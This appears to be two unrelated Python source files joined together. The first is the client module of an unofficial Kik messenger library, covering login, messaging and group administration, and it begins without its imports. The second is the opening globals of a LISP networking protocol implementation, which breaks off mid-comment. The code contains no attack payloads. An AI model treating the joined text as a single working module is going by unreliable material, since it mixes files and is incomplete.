import kik_unofficial.datatypes.exceptions as exceptions
import kik_unofficial.datatypes.xmpp.chatting as chatting
import kik_unofficial.datatypes.xmpp.group_adminship as group_adminship
import kik_unofficial.datatypes.xmpp.login as login
import kik_unofficial.datatypes.xmpp.roster as roster
import kik_unofficial.datatypes.xmpp.sign_up as sign_up
import kik_unofficial.xmlns_handlers as xmlns_handlers
from kik_unofficial.datatypes.xmpp.auth_stanza import AuthStanza
from kik_unofficial.datatypes.xmpp import account, xiphias
from kik_unofficial.utilities.threading_utils import run_in_new_thread
from kik_unofficial.datatypes.xmpp.base_elements import XMPPElement
from kik_unofficial.http import profile_pictures, content
HOST, PORT = "talk1110an.kik.com", 5223
log = logging.getLogger('kik_unofficial')
class KikClient:
"""
The main kik class with which you're managing a kik connection and sending commands
"""
def __init__(self, callback: callbacks.KikClientCallback, kik_username, kik_password,
kik_node=None, log_level=logging.INFO, device_id_override=None, android_id_override=None):
"""
Initializes a connection to Kik servers.
If you want to automatically login too, use the username and password parameters.
:param callback: a callback instance containing your callbacks implementation.
This way you'll get notified whenever certain event happen.
Look at the KikClientCallback class for more details
:param kik_username: the kik username or email to log in with.
:param kik_password: the kik password to log in with.
:param kik_node: the username plus 3 letters after the "_" and before the "@" in the JID. If you know it,
authentication will happen faster and without a login. otherwise supply None.
:param log_level: logging level.
"""
self._set_up_logging(log_level)
self.username = kik_username
self.password = kik_password
self.kik_node = kik_node
self.kik_email = None
self.device_id_override = device_id_override
self.android_id_override = android_id_override
self.callback = callback
self.authenticator = AuthStanza(self)
self.connected = False
self.authenticated = False
self.connection = None
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
self._known_users_information = set()
self._new_user_added_event = Event()
self.should_login_on_connection = kik_username is not None and kik_password is not None
self._connect()
def _connect(self):
"""
Runs the kik connection thread, which creates an encrypted (SSL based) TCP connection
to the kik servers.
"""
self.kik_connection_thread = Thread(target=self._kik_connection_thread_function, name="Kik Connection")
self.kik_connection_thread.start()
def _on_connection_made(self):
"""
Gets called when the TCP connection to kik's servers is done and we are connected.
Now we might initiate a login request or an auth request.
"""
if self.username is not None and self.password is not None and self.kik_node is not None:
# we have all required credentials, we can authenticate
log.info("[+] Establishing authenticated connection using kik node '{}'...".format(self.kik_node))
message = login.EstablishAuthenticatedSessionRequest(self.kik_node, self.username, self.password, self.device_id_override)
self.initial_connection_payload = message.serialize()
else:
self.initial_connection_payload = '<k anon="">'.encode()
self.connection.send_raw_data(self.initial_connection_payload)
def _establish_authenticated_session(self, kik_node):
"""
Updates the kik node and creates a new connection to kik servers.
This new connection will be initiated with another payload which proves
we have the credentials for a specific user. This is how authentication is done.
:param kik_node: The user's kik node (everything before '@' in JID).
"""
self.kik_node = kik_node
log.info("[+] Closing current connection and creating a new authenticated one.")
self.disconnect()
self._connect()
def login(self, username, password, captcha_result=None):
"""
Sends a login request with the given kik username and password
:param username: Your kik username or email
:param password: Your kik password
:param captcha_result: If this parameter is provided, it is the answer to the captcha given in the previous
login attempt.
"""
self.username = username
self.password = password
login_request = login.LoginRequest(username, password, captcha_result, self.device_id_override, self.android_id_override)
login_type = "email" if '@' in self.username else "username"
log.info("[+] Logging in with {} '{}' and a given password {}..."
.format(login_type, username, '*' * len(password)))
return self._send_xmpp_element(login_request)
def register(self, email, username, password, first_name, last_name, birthday="1974-11-20", captcha_result=None):
"""
Sends a register request to sign up a new user to kik with the given details.
"""
self.username = username
self.password = password
register_message = sign_up.RegisterRequest(email, username, password, first_name, last_name, birthday, captcha_result,
self.device_id_override, self.android_id_override)
log.info("[+] Sending sign up request (name: {} {}, email: {})...".format(first_name, last_name, email))
return self._send_xmpp_element(register_message)
def request_roster(self, is_big=True, timestamp=None):
"""
Requests the list of chat partners (people and groups). This is called roster in XMPP terms.
"""
log.info("[+] Requesting roster (list of chat partners)...")
return self._send_xmpp_element(roster.FetchRosterRequest(is_big=is_big, timestamp=timestamp))
# -------------------------------
# Common Messaging Operations
# -------------------------------
def send_chat_message(self, peer_jid: str, message: str, bot_mention_jid=None):
"""
Sends a text chat message to another person or a group with the given JID/username.
:param peer_jid: The Jabber ID for which to send the message (looks like username_ejs@talk.kik.com)
If you don't know the JID of someone, you can also specify a kik username here.
:param message: The actual message body
:param bot_mention_jid: If an official bot is referenced, their jid must be embedded as mention for them
to respond.
"""
peer_jid = self.get_jid(peer_jid)
if self.is_group_jid(peer_jid):
log.info("[+] Sending chat message '{}' to group '{}'...".format(message, peer_jid))
return self._send_xmpp_element(chatting.OutgoingGroupChatMessage(peer_jid, message, bot_mention_jid))
else:
log.info("[+] Sending chat message '{}' to user '{}'...".format(message, peer_jid))
return self._send_xmpp_element(chatting.OutgoingChatMessage(peer_jid, message, False, bot_mention_jid))
def send_chat_image(self, peer_jid: str, file, forward=True):
"""
Sends an image chat message to another person or a group with the given JID/username.
:param peer_jid: The Jabber ID for which to send the message (looks like username_ejs@talk.kik.com)
If you don't know the JID of someone, you can also specify a kik username here.
:param file: The path to the image file OR its bytes OR an IOBase object to send.
"""
peer_jid = self.get_jid(peer_jid)
if self.is_group_jid(peer_jid):
log.info("[+] Sending chat image to group '{}'...".format(peer_jid))
imageRequest = chatting.OutgoingGroupChatImage(peer_jid, file, forward)
else:
log.info("[+] Sending chat image to user '{}'...".format(peer_jid))
imageRequest = chatting.OutgoingChatImage(peer_jid, file, False, forward)
content.upload_gallery_image(imageRequest, self.kik_node + '@talk.kik.com', self.username, self.password)
return self._send_xmpp_element(imageRequest)
def send_read_receipt(self, peer_jid: str, receipt_message_id: str, group_jid=None):
"""
Sends a read receipt for a previously sent message, to a specific user or group.
:param peer_jid: The JID of the user to which to send the receipt.
:param receipt_message_id: The message ID that the receipt is sent for
:param group_jid If the receipt is sent for a message that was sent in a group,
this parameter should contain the group's JID
"""
log.info("[+] Sending read receipt to JID {} for message ID {}".format(peer_jid, receipt_message_id))
return self._send_xmpp_element(chatting.OutgoingReadReceipt(peer_jid, receipt_message_id, group_jid))
def send_delivered_receipt(self, peer_jid: str, receipt_message_id: str):
"""
Sends a receipt indicating that a specific message was received, to another person.
:param peer_jid: The other peer's JID to send to receipt to
:param receipt_message_id: The message ID for which to generate the receipt
"""
log.info("[+] Sending delivered receipt to JID {} for message ID {}".format(peer_jid, receipt_message_id))
return self._send_xmpp_element(chatting.OutgoingDeliveredReceipt(peer_jid, receipt_message_id))
def send_is_typing(self, peer_jid: str, is_typing: bool):
"""
Updates the 'is typing' status of the bot during a conversation.
:param peer_jid: The JID that the notification will be sent to
:param is_typing: If true, indicates that we're currently typing, or False otherwise.
"""
if self.is_group_jid(peer_jid):
return self._send_xmpp_element(chatting.OutgoingGroupIsTypingEvent(peer_jid, is_typing))
else:
return self._send_xmpp_element(chatting.OutgoingIsTypingEvent(peer_jid, is_typing))
def send_gif_image(self, peer_jid: str, search_term):
"""
Sends a GIF image to another person or a group with the given JID/username.
The GIF is taken from tendor.com, based on search keywords.
:param peer_jid: The Jabber ID for which to send the message (looks like username_ejs@talk.kik.com
:param search_term: The search term to use when searching GIF images on tendor.com
"""
if self.is_group_jid(peer_jid):
log.info("[+] Sending a GIF message to group '{}'...".format(peer_jid))
return self._send_xmpp_element(chatting.OutgoingGIFMessage(peer_jid, search_term, True))
else:
log.info("[+] Sending a GIF message to user '{}'...".format(peer_jid))
return self._send_xmpp_element(chatting.OutgoingGIFMessage(peer_jid, search_term, False))
def request_info_of_users(self, peer_jids: Union[str, List[str]]):
"""
Requests basic information (username, JID, display name, picture) of some users.
When the information arrives, the callback on_peer_info_received() will fire.
:param peer_jids: The JID(s) or the username(s) for which to request the information.
If you want to request information for more than one user, supply a list of strings.
Otherwise, supply a string
"""
return self._send_xmpp_element(roster.QueryUsersInfoRequest(peer_jids))
def add_friend(self, peer_jid):
return self._send_xmpp_element(roster.AddFriendRequest(peer_jid))
def remove_friend(self, peer_jid):
return self._send_xmpp_element(roster.RemoveFriendRequest(peer_jid))
def send_link(self, peer_jid, link, title, text='', app_name='Webpage'):
return self._send_xmpp_element(chatting.OutgoingLinkShareEvent(peer_jid, link, title, text, app_name))
def xiphias_get_users(self, peer_jids: Union[str, List[str]]):
"""
Calls the new format xiphias message to request user data such as profile creation date
and background picture URL.
:param peer_jids: one jid, or a list of jids
"""
return self._send_xmpp_element(xiphias.UsersRequest(peer_jids))
def xiphias_get_users_by_alias(self, alias_jids: Union[str, List[str]]):
"""
Like xiphias_get_users, but for aliases instead of jids.
:param alias_jids: one jid, or a list of jids
"""
return self._send_xmpp_element(xiphias.UsersByAliasRequest(alias_jids))
# --------------------------
# Group Admin Operations
# -------------------------
def change_group_name(self, group_jid: str, new_name: str):
"""
Changes the a group's name to something new
:param group_jid: The JID of the group whose name should be changed
:param new_name: The new name to give to the group
"""
log.info("[+] Requesting a group name change for JID {} to '{}'".format(group_jid, new_name))
return self._send_xmpp_element(group_adminship.ChangeGroupNameRequest(group_jid, new_name))
def add_peer_to_group(self, group_jid, peer_jid):
"""
Adds someone to a group
:param group_jid: The JID of the group into which to add a user
:param peer_jid: The JID of the user to add
"""
log.info("[+] Requesting to add user {} into the group {}".format(peer_jid, group_jid))
return self._send_xmpp_element(group_adminship.AddToGroupRequest(group_jid, peer_jid))
def remove_peer_from_group(self, group_jid, peer_jid):
"""
Kicks someone out of a group
:param group_jid: The group JID from which to remove the user
:param peer_jid: The JID of the user to remove
"""
log.info("[+] Requesting removal of user {} from group {}".format(peer_jid, group_jid))
return self._send_xmpp_element(group_adminship.RemoveFromGroupRequest(group_jid, peer_jid))
def ban_member_from_group(self, group_jid, peer_jid):
"""
Bans a member from the group
:param group_jid: The JID of the relevant group
:param peer_jid: The JID of the user to ban
"""
log.info("[+] Requesting ban of user {} from group {}".format(peer_jid, group_jid))
return self._send_xmpp_element(group_adminship.BanMemberRequest(group_jid, peer_jid))
def unban_member_from_group(self, group_jid, peer_jid):
"""
Undos a ban of someone from a group
:param group_jid: The JID of the relevant group
:param peer_jid: The JID of the user to un-ban from the gorup
"""
log.info("[+] Requesting un-banning of user {} from the group {}".format(peer_jid, group_jid))
return self._send_xmpp_element(group_adminship.UnbanRequest(group_jid, peer_jid))
def join_group_with_token(self, group_hashtag, group_jid, join_token):
"""
Tries to join into a specific group, using a cryptographic token that was received earlier from a search
:param group_hashtag: The public hashtag of the group into which to join (like '#Music')
:param group_jid: The JID of the same group
:param join_token: a token that can be extracted in the callback on_group_search_response, after calling
search_group()
"""
log.info("[+] Trying to join the group '{}' with JID {}".format(group_hashtag, group_jid))
return self._send_xmpp_element(roster.GroupJoinRequest(group_hashtag, join_token, group_jid))
def leave_group(self, group_jid):
"""
Leaves a specific group
:param group_jid: The JID of the group to leave
"""
log.info("[+] Leaving group {}".format(group_jid))
return self._send_xmpp_element(group_adminship.LeaveGroupRequest(group_jid))
def promote_to_admin(self, group_jid, peer_jid):
"""
Turns some group member into an admin
:param group_jid: The group JID for which the member will become an admin
:param peer_jid: The JID of user to turn into an admin
"""
log.info("[+] Promoting user {} to admin in group {}".format(peer_jid, group_jid))
return self._send_xmpp_element(group_adminship.PromoteToAdminRequest(group_jid, peer_jid))
def demote_admin(self, group_jid, peer_jid):
"""
Turns an admin of a group into a regular user with no amidships capabilities.
:param group_jid: The group JID in which the rights apply
:param peer_jid: The admin user to demote
:return:
"""
log.info("[+] Demoting user {} to a regular member in group {}".format(peer_jid, group_jid))
return self._send_xmpp_element(group_adminship.DemoteAdminRequest(group_jid, peer_jid))
def add_members(self, group_jid, peer_jids: Union[str, List[str]]):
"""
Adds multiple users to a specific group at once
:param group_jid: The group into which to join the users
:param peer_jids: a list (or a single string) of JIDs to add to the group
"""
log.info("[+] Adding some members to the group {}".format(group_jid))
return self._send_xmpp_element(group_adminship.AddMembersRequest(group_jid, peer_jids))
# ----------------------
# Other Operations
# ----------------------
def search_group(self, search_query):
"""
Searches for public groups using a query
Results will be returned using the on_group_search_response() callback
:param search_query: The query that contains some of the desired groups' name.
"""
log.info("[+] Initiating a search for groups using the query '{}'".format(search_query))
return self._send_xmpp_element(roster.GroupSearchRequest(search_query))
def check_username_uniqueness(self, username):
"""
Checks if the given username is available for registration.
Results are returned in the on_username_uniqueness_received() callback
:param username: The username to check for its existence
"""
log.info("[+] Checking for Uniqueness of username '{}'".format(username))
return self._send_xmpp_element(sign_up.CheckUsernameUniquenessRequest(username))
def set_profile_picture(self, filename):
"""
Sets the profile picture of the current user
:param filename: The path to the file OR its bytes OR an IOBase object to set
"""
log.info("[+] Setting the profile picture to file '{}'".format(filename))
profile_pictures.set_profile_picture(filename, self.kik_node + '@talk.kik.com', self.username, self.password)
def set_background_picture(self, filename):
"""
Sets the background picture of the current user
:param filename: The path to the image file OR its bytes OR an IOBase object to set
"""
log.info("[+] Setting the background picture to filename '{}'".format(filename))
profile_pictures.set_background_picture(filename, self.kik_node + '@talk.kik.com', self.username, self.password)
def send_captcha_result(self, stc_id, captcha_result):
"""
In case a captcha was encountered, solves it using an element ID and a response parameter.
The stc_id can be extracted from a CaptchaElement, and the captcha result needs to be extracted manually with
a browser. Please see solve_captcha_wizard() for the steps needed to solve the captcha
:param stc_id: The stc_id from the CaptchaElement that was encountered
:param captcha_result: The answer to the captcha (which was generated after solved by a human)
"""
log.info("[+] Trying to solve a captcha with result: '{}'".format(captcha_result))
return self._send_xmpp_element(login.CaptchaSolveRequest(stc_id, captcha_result))
def change_display_name(self, first_name, last_name):
"""
Changes the display name
:param first_name: The first name
:param last_name: The last name
"""
log.info("[+] Changing the display name to '{} {}'".format(first_name, last_name))
return self._send_xmpp_element(account.ChangeNameRequest(first_name, last_name))
def change_password(self, new_password, email):
"""
Changes the login password
:param new_password: The new login password to set for the account
:param email: The current email of the account
"""
log.info("[+] Changing the password of the account")
return self._send_xmpp_element(account.ChangePasswordRequest(self.password, new_password, email, self.username))
def change_email(self, old_email, new_email):
"""
Changes the email of the current account
:param old_email: The current email
:param new_email: The new email to set
"""
log.info("[+] Changing account email to '{}'".format(new_email))
return self._send_xmpp_element(account.ChangeEmailRequest(self.password, old_email, new_email))
def disconnect(self):
"""
Closes the connection to kik's servers.
"""
log.info("[!] Disconnecting.")
self.connection.close()
# self.loop.call_soon(self.loop.stop)
# -----------------
# Internal methods
# -----------------
def _send_xmpp_element(self, message: XMPPElement):
"""
Serializes and sends the given XMPP element to kik servers
:param xmpp_element: The XMPP element to send
:return: The UUID of the element that was sent
"""
while not self.connected:
log.debug("[!] Waiting for connection.")
time.sleep(0.1)
if type(message.serialize()) is list:
log.debug("[!] Sending multi packet data.")
packets = message.serialize()
for p in packets:
self.loop.call_soon_threadsafe(self.connection.send_raw_data, p)
return message.message_id
else:
self.loop.call_soon_threadsafe(self.connection.send_raw_data, message.serialize())
return message.message_id
@run_in_new_thread
def _on_new_data_received(self, data: bytes):
"""
Gets called whenever we get a whole new XML element from kik's servers.
:param data: The data received (bytes)
"""
if data == b' ':
# Happens every half hour. Disconnect after 10th time. Some kind of keep-alive? Let's send it back.
self.loop.call_soon_threadsafe(self.connection.send_raw_data, b' ')
return
xml_element = BeautifulSoup(data.decode('utf-8'), features='xml')
xml_element = next(iter(xml_element)) if len(xml_element) > 0 else xml_element
# choose the handler based on the XML tag name
if xml_element.name == "k":
self._handle_received_k_element(xml_element)
if xml_element.name == "iq":
self._handle_received_iq_element(xml_element)
elif xml_element.name == "message":
self._handle_xmpp_message(xml_element)
elif xml_element.name == 'stc':
self.callback.on_captcha_received(login.CaptchaElement(xml_element))
def _handle_received_k_element(self, k_element: BeautifulSoup):
"""
The 'k' element appears to be kik's connection-related stanza.
It lets us know if a connection or a login was successful or not.
:param k_element: The XML element we just received from kik.
"""
if k_element['ok'] == "1":
self.connected = True
if 'ts' in k_element.attrs:
# authenticated!
log.info("[+] Authenticated successfully.")
self.authenticated = True
self.authenticator.sendStanza()
self.callback.on_authenticated()
elif self.should_login_on_connection:
self.login(self.username, self.password)
self.should_login_on_connection = False
else:
self.callback.on_connection_failed(login.ConnectionFailedResponse(k_element))
def _handle_received_iq_element(self, iq_element: BeautifulSoup):
"""
The 'iq' (info/query) stanzas in XMPP represents the request/ response elements.
We send an iq stanza to request for information, and we receive an iq stanza in response to this request,
with the same ID attached to it.
For a great explanation of this stanza: http://slixmpp.readthedocs.io/api/stanza/iq.html
:param iq_element: The iq XML element we just received from kik.
"""
if iq_element.error and "bad-request" in dir(iq_element.error):
raise Exception("Received a Bad Request error for stanza with ID {}".format(iq_element.attrs['id']))
query = iq_element.query
xml_namespace = query['xmlns'] if 'xmlns' in query.attrs else query['xmlns:']
self._handle_response(xml_namespace, iq_element)
def _handle_response(self, xmlns, iq_element):
"""
Handles a response that we receive from kik after our initiated request.
Examples: response to a group search, response to fetching roster, etc.
:param xmlns: The XML namespace that helps us understand what type of response this is
:param iq_element: The actual XML element that contains the response
"""
if xmlns == 'kik:iq:check-unique':
xmlns_handlers.CheckUsernameUniqueResponseHandler(self.callback, self).handle(iq_element)
elif xmlns == 'jabber:iq:register':
xmlns_handlers.RegisterOrLoginResponseHandler(self.callback, self).handle(iq_element)
elif xmlns == 'jabber:iq:roster':
xmlns_handlers.RosterResponseHandler(self.callback, self).handle(iq_element)
elif xmlns == 'kik:iq:friend' or xmlns == 'kik:iq:friend:batch':
xmlns_handlers.PeersInfoResponseHandler(self.callback, self).handle(iq_element)
elif xmlns == 'kik:iq:xiphias:bridge':
xmlns_handlers.XiphiasHandler(self.callback, self).handle(iq_element)
elif xmlns == 'kik:auth:cert':
self.authenticator.handle(iq_element)
def _handle_xmpp_message(self, xmpp_message: BeautifulSoup):
"""
an XMPP 'message' in the case of Kik is the actual stanza we receive when someone sends us a message
(weather groupchat or not), starts typing, stops typing, reads our message, etc.
Examples: http://slixmpp.readthedocs.io/api/stanza/message.html
:param xmpp_message: The XMPP 'message' element we received
"""
self._handle_kik_event(xmpp_message)
def _handle_kik_event(self, xmpp_element):
"""
Handles kik "push" events, like a new message that arrives.
:param xmpp_element: The XML element that we received with the information about the event
"""
if 'xmlns' in xmpp_element.attrs:
# The XML namespace is different for iOS and Android, handle the messages with their actual type
if xmpp_element['type'] == "chat":
xmlns_handlers.XMPPMessageHandler(self.callback, self).handle(xmpp_element)
elif xmpp_element['type'] == "groupchat":
xmlns_handlers.GroupXMPPMessageHandler(self.callback, self).handle(xmpp_element)
else:
pass
elif xmpp_element['type'] == 'receipt':
if xmpp_element.g:
self.callback.on_group_receipts_received(chatting.IncomingGroupReceiptsEvent(xmpp_element))
else:
xmlns_handlers.XMPPMessageHandler(self.callback, self).handle(xmpp_element)
else:
# iPads send messages without xmlns, try to handle it as jabber:client
xmlns_handlers.XMPPMessageHandler(self.callback, self).handle(xmpp_element)
def _on_connection_lost(self):
"""
Gets called when the connection to kik's servers is unexpectedly lost.
It could be that we received a connection reset packet for example.
:return:
"""
self.connected = False
log.info("[-] The connection was lost")
def _kik_connection_thread_function(self):
"""
The Kik Connection thread main function.
Initiates the asyncio loop and actually connects.
"""
# If there is already a connection going, than wait for it to stop
if self.loop and self.loop.is_running():
self.loop.call_soon_threadsafe(self.connection.close)
log.debug("[!] Waiting for the previous connection to stop.")
while self.loop.is_running():
log.debug("[!] Still Waiting for the previous connection to stop.")
time.sleep(1)
log.info("[+] Initiating the Kik Connection thread and connecting to kik server...")
# create the connection and launch the asyncio loop
self.connection = KikConnection(self.loop, self)
coro = self.loop.create_connection(lambda: self.connection, HOST, PORT, ssl=True)
self.loop.run_until_complete(coro)
log.debug("[!] Running main loop")
self.loop.run_forever()
log.debug("[!] Main loop ended.")
self.callback.on_disconnected()
def get_jid(self, username_or_jid):
if '@' in username_or_jid:
# this is already a JID.
return username_or_jid
else:
username = username_or_jid
# first search if we already have it
if self.get_jid_from_cache(username) is None:
# go request for it
self._new_user_added_event.clear()
self.request_info_of_users(username)
if not self._new_user_added_event.wait(5.0):
raise TimeoutError("Could not get the JID for username {} in time".format(username))
return self.get_jid_from_cache(username)
def get_jid_from_cache(self, username):
for user in self._known_users_information:
if user.username.lower() == username.lower():
return user.jid
return None
def _set_up_logging(self, log_level):
log_formatter = logging.Formatter('[%(asctime)-15s] %(levelname)-6s (thread %(threadName)-10s): %(message)s')
root_logger = logging.getLogger()
root_logger.setLevel(logging.DEBUG)
kik_logger = logging.getLogger('kik_unofficial')
if len(kik_logger.handlers) == 0:
file_handler = logging.FileHandler("kik-debug.log")
file_handler.setFormatter(log_formatter)
file_handler.setLevel(logging.DEBUG)
kik_logger.addHandler(file_handler)
console_handler = logging.StreamHandler(sys.stdout)
console_handler.setLevel(log_level)
console_handler.setFormatter(log_formatter)
kik_logger.addHandler(console_handler)
logging.getLogger('asyncio').setLevel(logging.WARNING)
@staticmethod
def is_group_jid(jid):
if '@talk.kik.com' in jid:
return False
elif '@groups.kik.com' in jid:
return True
else:
raise exceptions.KikApiException('Not a valid jid')
class KikConnection(Protocol):
def __init__(self, loop, api: KikClient):
self.api = api
self.loop = loop
self.partial_data = None # type: bytes
self.partial_data_start_tag = None # type: str
self.transport = None # type: Transport
def connection_made(self, transport: Transport):
self.transport = transport
log.info("[!] Connected.")
self.api._on_connection_made()
def data_received(self, data: bytes):
log.debug("[+] Received raw data: %s", data)
if self.partial_data is None:
if len(data) < 16384:
self.loop.call_soon_threadsafe(self.api._on_new_data_received, data)
else:
log.debug("Multi-packet data, waiting for next packet.")
start_tag, is_closing = self.parse_start_tag(data)
self.partial_data_start_tag = start_tag
self.partial_data = data
else:
if self.ends_with_tag(self.partial_data_start_tag, data):
self.loop.call_soon_threadsafe(self.api._on_new_data_received, self.partial_data + data)
self.partial_data = None
self.partial_data_start_tag = None
else:
log.debug("[!] Waiting for another packet, size={}".format(len(self.partial_data)))
self.partial_data += data
@staticmethod
def parse_start_tag(data: bytes) -> Tuple[bytes, bool]:
tag = data.lstrip(b'<')
tag = tag.split(b'>')[0]
tag = tag.split(b' ')[0]
is_closing = tag.endswith(b'/')
if is_closing:
tag = tag[:-1]
return tag, is_closing
@staticmethod
def ends_with_tag(expected_end_tag: bytes, data: bytes):
return data.endswith(b'</' + expected_end_tag + b'>')
def connection_lost(self, exception):
self.loop.call_soon_threadsafe(self.api._on_connection_lost)
self.loop.stop()
def send_raw_data(self, data: bytes):
log.debug("[+] Sending raw data: %s", data)
self.transport.write(data)
def close(self):
if self.transport:
self.transport.write(b'</k>')
|
lisp.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp.py
#
# This file contains all constants, definitions, data structures, packet
# send and receive functions for the LISP protocol according to RFC 6830.
#
#------------------------------------------------------------------------------
import socket
import time
import struct
import binascii
import hmac
import hashlib
import datetime
import os
import sys
import random
import threading
import operator
import netifaces
import platform
import Queue
import traceback
from Crypto.Cipher import AES
import ecdsa
import json
import commands
import copy
import chacha
import poly1305
from geopy.distance import vincenty
import curve25519
use_chacha = (os.getenv("LISP_USE_CHACHA") != None)
use_poly = (os.getenv("LISP_USE_POLY") != None)
#
# For printing the lisp_rloc_probe_list{}.
#
lisp_print_rloc_probe_list = False
#------------------------------------------------------------------------------
#
# Global variables.
#
lisp_hostname = ""
lisp_version = ""
lisp_uptime = ""
lisp_i_am_core = False
lisp_i_am_itr = False
lisp_i_am_etr = False
lisp_i_am_rtr = False
lisp_i_am_mr = False
lisp_i_am_ms = False
lisp_i_am_ddt = False
lisp_log_id = ""
lisp_debug_logging = True
lisp_map_notify_queue = {} # Key is concat of nonce and etr address
lisp_map_servers_list = {} # Key is ms-name/address string, value lisp_ms()
lisp_ddt_map_requestQ = {}
lisp_db_list = [] # Elements are class lisp_mapping()
lisp_group_mapping_list = {} # Elements are class lisp_group_mapping()
lisp_map_resolvers_list = {} # Key is mr-name/address string, value lisp_mr()
lisp_rtr_list = {} # Key is address string, value is lisp_address()
lisp_elp_list = {}
lisp_rle_list = {}
lisp_geo_list = {}
lisp_json_list = {}
lisp_myrlocs = [None, None, None]
lisp_mymacs = {}
#
# Used for multi-tenancy. First dictionary array is indexed by device name
# and second one has value lisp_interface() indexed by a instance-id string.
#
lisp_myinterfaces = {}
lisp_iid_to_interface = {}
lisp_multi_tenant_interfaces = []
lisp_test_mr_timer = None
lisp_rloc_probe_timer = None
#
# Stats variables.
#
lisp_registered_count = 0
#
# For tracking Map-Requesters behind NAT devices.
#
lisp_info_sources_by_address = {}
lisp_info_sources_by_nonce = {}
#
# Store computed keys per RLOC. The key is the nonce from the Map-Request
# at the time creates the g, p, and public-key values. The value is an
# array of 4 elements, indexed by key-id.
#
lisp_crypto_keys_by_nonce = {}
lisp_crypto_keys_by_rloc_encap = {} # Key is "<rloc>:<port>" tuple
lisp_crypto_keys_by_rloc_decap = {} # Key is "<rloc>:<port>" tuple
lisp_data_plane_security = False
lisp_search_decap_keys = True
lisp_data_plane_logging = False
lisp_frame_logging = False
lisp_flow_logging = False
#
# When NAT-traversal is enabled and lisp-crypto is enabled, an ITR needs
# to send RLOC-probe requests with an ephemeral port that is also used
# for data encapsulation to the RTR. This way the RTR can find the crypto
# key when multiple xTRs are behind the same NAT.
#
lisp_crypto_ephem_port = None
#
# Is the lisp-itr process running as a PITR?
#
lisp_pitr = False
#
# Are we listening on all MAC frames?
#
lisp_l2_overlay = False
#
# RLOC-probing variables. And for NAT-traversal, register only reachable
# RTRs which is determined from the lisp_rloc_probe_list.
#
lisp_rloc_probing = False
lisp_rloc_probe_list = {}
#
# Command "lisp xtr-parameters" register-reachabile-rtrs has opposite polarity
# to lisp_register_all_rtrs. So by default we do not consider RLOC-probing
# reachability status in registering RTRs to the mapping system.
#
lisp_register_all_rtrs = True
#
# Nonce Echo variables.
#
lisp_nonce_echoing = False
lisp_nonce_echo_list = {}
#
# xTR configuration parameters.
#
lisp_nat_traversal = False
#
# xTR configuration parameters. This flag is used to indicate that when a
# map-cache entry is created or updated, that we write specific information
# to say a Broadcom chip, that will do VXLAN encapsulation. This is a way
# to get existing hardware to do L3 overlays with the LISP control-plane
# when all it supports is VXLAN. See lisp_program_vxlan_hardware()
#
lisp_program_hardware = False
#
# Should we write to the lisp.checkpoint file.
#
lisp_checkpoint_map_cache = False
lisp_checkpoint_filename = "./lisp.checkpoint"
#
# Should we write map-cache entries to a named socket for another data-plane?
#
lisp_ipc_data_plane = False
lisp_ipc_dp_socket = None
lisp_ipc_dp_socket_name = "lisp-ipc-data-plane"
#
# This lock is used so the lisp-core process doesn't intermix command
# processing data with show data and packet data.
#
lisp_ipc_lock = None
#
# Use this as a default instance-ID when there are no "lisp interface" commands
# configured. This default instance-ID is taken from the first database-mapping
# command.
#
lisp_default_iid = 0
#
# Configured list of RTRs that the lisp-core process will insert into
# Info-Reply messages.
#
lisp_ms_rtr_list = [] # Array of type lisp.lisp_address()
#
# Used in an RTR to store a translated port for a translated RLOC. Key is
# hostname that is sent in a Info-Request is a nested array. See
# lisp_store_nat_info() for details.
#
lisp_nat_state_info = {}
#
# Used for doing global rate-limiting of Map-Requests.
#
lisp_last_map_request_sent = None
#
# Array to store 1000 flows.
#
LISP_FLOW_LOG_SIZE = 100
lisp_flow_log = []
#
# Store configured or API added policy parameters.
#
lisp_policies = {}
#
# Load-split pings. We'll has the first long of a ICMP echo-request and
# echo-reply for testing purposes. To show per packet load-splitting.
#
lisp_load_split_pings = False
#
# This array is a configured list of IPv6-prefixes that define what part
# of a matching address is used as the crypto-hash. They must be on 4-bit
# boundaries for easy matching.
#
lisp_eid_hashes = []
#
# IPv4 reassembly buffer. We pcapture IPv4 fragments. They can come to the ETR
# when IPv6 is encapsulated in IPv4 and we have an MTU violation for the
# encapsulated packet. The array is index by the IPv4 ident field and contains
# an array of packet buffers. Once all fragments have arrived, the IP header
# is removed from all fragments except the first one.
#
lisp_reassembly_queue = {}
#
# Map-Server pubsub cache. Remember Map-Requesters that set the N-bit for
# a EID target it is requesting. Key is EID-prefix in string format with
# bracketed instance-ID included in slash format. The value of the dictionary
# array is a dictionary array of ITR addresses in string format.
#
lisp_pubsub_cache = {}
#
# When "decentralized-push-xtr = yes" is configured, the xTR is also running as
# a Map-Server and Map-Resolver. So Map-Register messages the ETR sends is
# looped back to the lisp-ms process.
#
lisp_decent_push_configured = False
#
# When "decentralized-pull-xtr-[modulus,dns-suffix] is configured, the xTR is
# also running as a Map-Server and Map-Resolver. So Map-Register messages the
# ETR sends is looped back to the lisp-ms process.
#
lisp_decent_modulus = 0
lisp_decent_dns_suffix = None
#
# lisp.lisp_ipc_socket is used by the lisp-itr process during RLOC-probing
# to send the lisp-etr process status about RTRs learned. This is part of
# NAT-traversal support.
#
lisp_ipc_socket = None
#
# Configured in the "lisp encryption-keys" command.
#
lisp_ms_encryption_keys = {}
#
# Used to stare NAT translated address state in an RTR when a ltr client
# is sending RLOC-based LISP-Trace messages. If the RTR encounters any
# LISP-Trace error proessing called from lisp_rtr_data_plane() then it
# can return a partially filled LISP-Trace packet to the ltr client that
# site behind a NAT device.
#
# Dictiionary array format is:
# key = self.local_addr + ":" + self.local_port
# lisp_rtr_nat_trace_cache[key] = (translated_rloc, translated_port)
#
# And the array elements are added in lisp_trace.rtr_cache_nat_trace().
#
lisp_rtr_nat_trace_cache = {}
#
# Configured glean mappings. The data structure is an array of dictionary
# arrays with keywords "eid-prefix", "rloc-prefix", and "instance-id". If
# keywords are not in dictionary array, the value is wildcarded. The values
